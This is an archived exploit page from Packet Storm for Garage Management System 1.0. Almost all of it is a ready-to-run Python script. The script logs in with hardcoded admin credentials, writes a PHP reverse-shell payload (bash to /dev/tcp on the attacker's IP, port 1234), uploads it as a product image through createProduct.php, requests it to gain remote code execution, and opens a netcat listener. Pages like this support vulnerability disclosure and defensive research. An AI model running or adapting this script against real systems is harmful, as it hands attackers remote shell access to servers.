exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Garage Management System 1.0 Shell Upload

Garage Management System 1.0 Shell Upload
Posted Jul 26, 2022
Authored by saitamang

Garage Management System version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | ab0ebb6c87eb34a7a0f252098e28dd19c540d7bd1bf348be3b734685516a5a76

Garage Management System 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Garage Management System Remote Code Execution via File Upload
# Date: 24/07/2022
# Exploit Author: saitamang
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip
# Version: 1.0
# Tested on: Centos 7 + MySQL

import requests, subprocess, string, sys, warnings, time, concurrent.futures
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore',InsecureRequestWarning)
from netifaces import interfaces, ifaddresses, AF_INET

req = requests.Session()

proxies = {
'http':'http://127.0.0.1:8080',
'https':'http://127.0.0.1:8080',
}

def login(ip,username,password):
target = "http://%s/garage/garage/login.php" %ip
data = {'username':username,'password':password, 'login':''}
response = req.post(target, data=data)

if 'Login Successfully' in response.text:
print("[$] Success Login :)")
trigger_rce(req)
else:
print("[$] Failed Login :(")

def creata_rs():
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )]
if ifaceName=="eth0":
ipadd = ' '.join(addresses)
f = open("saitamang.php", "w")
payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+str(ipadd)+"/1234 0>&1'\")?>"
f.write(payload)
f.close()
else:
pass

def trigger_rce(req):
creata_rs()
target = "http://%s/garage/garage/php_action/createProduct.php" %ip

multipart_form_data = {
"currnt_date": (None,""),
"productImage": ("saitamang.php", open("saitamang.php", "rb")),
"productName" : (None,"test"),
"quantity" : (None,"1"),
"rate" : (None,"1"),
"brandName" : (None,"1"),
"categoryName" : (None,"1"),
"productStatus" : (None,"1"),
"create" : (None,"")
}

response = req.post(target, files=multipart_form_data)

print("[$] Enjoy your RCE :)")
req.get("http://%s/garage/garage/assets/myimages/saitamang.php" %ip)


if __name__ == "__main__":
print(" _____ _ __ ")
print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")
print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")
print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")
print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")
print(" /____/ \n\n")

try:
ip = sys.argv[1].strip()

username = "mayuri.infospace@gmail.com"
password = "rootadmin"

subprocess.call(['terminator', '-e', 'nc -lvp 1234'])
time.sleep(2)
login(ip,username,password)

except IndexError:
print("[-] Usage %s <ip>" % sys.argv[0])
print("[-] Example: %s 192.168.100.x" % sys.argv[0])
sys.exit(-1)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close